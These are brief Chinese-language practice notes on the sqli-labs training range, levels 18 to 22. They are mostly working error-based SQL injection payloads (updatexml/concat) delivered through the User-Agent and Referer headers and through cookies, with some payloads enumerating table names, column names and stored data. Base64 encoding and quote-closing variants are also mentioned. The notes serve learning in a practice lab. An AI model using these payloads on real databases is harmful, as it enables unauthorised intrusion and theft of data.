【靶场训练】sql-libs

less-18

user-agent注入

' and updatexml(1,concat('~',(select database()),'~'),1),1,1,) -- lq 

 

 

less-19

'or updatexml(1,concat(0x7e,(database())),1) and '1'='1

referer参数注入

 

 

less-20 cookie注入

 

' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),1) -- lq      判断表名

' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'~'),1) -- lq            判断字段名

' and updatexml(1,concat('~',(select id from security.emails limit 0,1),'~'),1) -- lq  表中数据

 less-21 based64编码(注释符绕过)

将sql语句采用based64编码加密注入

 

 

 

 报错了。提示单引号有错，采用过滤符绕过

 

 

 

 less-22与前一题一样采用闭合方式为双引号闭合